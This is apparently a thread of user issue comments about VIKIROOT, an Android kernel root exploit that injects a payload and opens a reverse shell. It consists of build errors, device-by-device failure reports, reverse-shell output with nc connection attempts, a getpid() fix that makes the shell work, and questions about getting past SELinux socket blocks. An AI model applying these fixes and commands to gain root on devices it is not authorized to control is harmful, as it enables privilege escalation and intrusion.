.just send string between terminal .
how can use nc?

如题，是否可以支持4.x和5.x?

jni/exploit.c:43:21: fatal error: payload.h: No such file or directory
#include "payload.h"

After downloading the repository and running make all, I get the output

exploit.o: In function `ptrace_thread':
exploit.c:(.text+0x160): undefined reference to `stderr'
exploit.c:(.text+0x164): undefined reference to `stderr'
exploit.c:(.text+0x1a4): undefined reference to `stderr'
exploit.c:(.text+0x1a8): undefined reference to `stderr'
exploit.c:(.text+0x24c): undefined reference to `stderr'
exploit.o:exploit.c:(.text+0x250): more undefined references to `stderr' follow
collect2: error: ld returned 1 exit status
Makefile:13: recipe for target 'exploit' failed
make: *** [exploit] Error 1

I ran the make command just as I downloaded it. I only had to change the Makefile in order to add absolute paths to the NDK binaries as they weren't in my PATH.
Probably fault of Android NDK, but I cannot get VIKIROOT working at all...

thanks for your poc ,@hyln9 ,It's interesting!
when i execute the poc on my phone ,i get the informatin as follows:
shell@shamu:/data/local/tmp $ ./exploit 1234

Reverse shell target: 127.0.0.1:1234

Exploit process starts.

Inject: patch 1/2

Inject: patch 2/2

Please wake up you phone now.

Waiting for reverse connect shell.

#!but now,i don't know how to get the reverse shell and i also want to know how to connect the shell by nc ,can you tell me about that,thanks!

What exactly does "payload.s", is this "payload.h", am I right? How to compile this, help me please.

Sir,
I am trying to build your code it give me an error like this

"aarch64-linux-android-objcopy : payload.o:Invalid bfd target"

Is there anything i need to install before start compilation

Thanks

compiled the latest source code, builds fine yet doesnt work (ZTE blade blitz x64), set permissions 777 and execute ./exploit but nothing happens.

Also happy to test on nougat

As described in the Bugs section here, some versions of libc have a bug where getpid() in a clone()d thread will return the parent PID rather than the child. (That page says CLONE_VM prevents it, but guess what, it happened anyway!)

Really lazy fix is:

#include <sys/syscall.h>
#define getpid() syscall(SYS_getpid)

After that, the reverse shell works.

D:\Program Files (x86)\Android\android-sdk\platform-tools>adb shell /data/local/
tmp/exploit
/system/bin/sh: /data/local/tmp/exploit: can't execute: Permission denied

D:\Program Files (x86)\Android\android-sdk\platform-tools>

D:\Program Files (x86)\Android\android-sdk\platform-tools>adb shell sh /data/loc
al/tmp/exploit
/data/local/tmp/exploit[1]: syntax error: '(' unexpected

D:\Program Files (x86)\Android\android-sdk\platform-tools>

I download the code and when laun make get this:

/opt/android-ndk-r15c-linux-x86_64//toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-as -o payload.o payload.s
/opt/android-ndk-r15c-linux-x86_64//toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy -O binary payload.o payload xxd -i payload payload.h
/opt/android-ndk-r15c-linux-x86_64/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=x86_64 APP_PLATFORM=android-23
make[1]: Entering directory /root/VIKIROOT
[x86_64] Compile : vikiroot <= exploit.c
./exploit.c:90:27: warning: duplicate 'const' declaration specifier [-Wduplicate-decl-specifier] static const struct entry const entry_db[] = { ^ 1 warning generated.
[x86_64] Executable : vikiroot
[x86_64] Install : vikiroot => libs/x86_64/vikiroot
make[1]: Leaving directory /root/VIKIROOT

I've tried to do it manual push the executable inside the devie and make the chmod and launch the exploit and receive this again:

Reverse shell target: 127.0.0.1:1337

Internal error: insufficient place for payload.

What could be happend?

I'm using the LS991 (LG G4 US-Sprint variant) on MM. On localhost, I can at least get it to run, and wait for a remote shell. Using Termux on the device and nc to try to connect to the shell, I get nothing. Specifying an ip in my local subnet (192.168.254.x), to which the device is connected via wifi, the device completely reboots.
What am I doing wrong, or is this by design unable to function this way?

i runt the exploit on nexus 6p android 7.1.1 but it stuck on
"Waiting for reverse connect shell"

I try it on Samsung galaxsy s7 with N (7.0). it is looks like nothing is happend.

I test the poc on android 6.0.1 , it success. but on android 6.0, it failed ?
Have you tested it on android 6.0 ?

On LG G4 with Android 6.0, the exploit works (code is running under init process), but fails to connect the shell due to selinux (connect() returns -EACCES). I've been toying with other methods (exec a shell script, open /dev/pts/n) but so far nothing. (I might be doing the /dev/pts part wrong?)

timwr's method (replacing run-as) does spawn a shell, but in a more limited context. Ideally I want a shell in init context, or some other that has more access.

Any other ideas to get around selinux blocking sockets?

I download your poc，and compile it by ndk,but,when i execute it on phone,it failed as follows:

Reverse shell target: 127.0.0.1:1111

Exploit process starts.

Inject: patch 1/2

[2] + Stopped (signal) ./exploit 1111

my Android.mk's content is :
LOCAL_MODULE := exploit
LOCAL_CFLAGS := -Os -fPIE -Wall
LOCAL_SRC_FILES := exploit.c
LOCAL_LDFLAGS := -pthread -s -pie -Wall
could you tell me why? thanks

i compiled using aarch64-linux-gnu-gcc for my android
but after in android when i try to execute it wont work.
getting error No such file or directory

请问有编译好的版本吗？方便留个联系方式吗？

Most armv7a (non-64bit) devices do not have VDSO enabled. Any suggestions on what might be the other places to inject?

In case of write remainder. All data you have in 'src' array already. Just correct both ptrs and write whole word.

thanks for your poc!
i test it on my phone(huawei P9, android 6.0).
but it does nothing , are you test it on huawei phone, is it use vdso?

When I try your root method, I can get to the terminal on 7.0 Nougat using Termux, but root has not been achieved.

whoami
u0_a211

Also, when I run certain programs (such as mount), I get this error on the phone:

CANNOT LINK EXECUTABLE "/system/bin/mount": cannot locate symbol "OpenSSL_add_all_algorithms" referenced by "/system/lib64/libselinux.so"...

Is this a problem with the program, or that I'm on 7.0 (I'm running this on an AT&T S7)?

step 1 :
i use wireless adb connect device

`adb connect 192.168.11.128

• daemon not running; starting now at tcp:5037
• daemon started successfully
  connected to 192.168.11.128:5555`

`$ ./exploit 5678

Reverse shell target: 127.0.0.1:9999

Exploit process starts.

Inject: patch 1/2

Inject: patch 2/2

Please wake up you phone now.

Waiting for reverse connect shell.

Enjoy!

====================TERMINAL====================

����host::features=cmd,stat_v2,shell_v2`

step 2:
adb connect 192.168.11.128:9999

• daemon not running; starting now at tcp:5037
• daemon started successfully
  failed to connect to 192.168.11.128:9999

adb shell error: device offline

try to reconnect
adb connect 192.168.11.128:9999 already connected to 192.168.11.128:9999

_MY device is SAMSUNGS7 and api is 7.0. i want shell.. please let me know your facebook or please contact me. my email is [email protected]
here is my problem.
android adb(192.168.17.12) || linux shell(192.168.17.39)
./exploit 2222
Reverse shell target: 127.0.0.1:2222

Exploit process starts.

Inject: patch 1/2

Inject: patch 2/2

Please wake up you phone now.

Waiting for reverse connect shell.
|| nc 192.168.17.12 2222
Enjoy!

======TERMINAL=====
|| asjdkasjkd
asjdkasjkd
||123
123
||ls <- command but it just send to string..
ls
======TERMINAL=====

Restore process starts.

Remove: patch 2/2

Remove: patch 1/2

Removing .x file._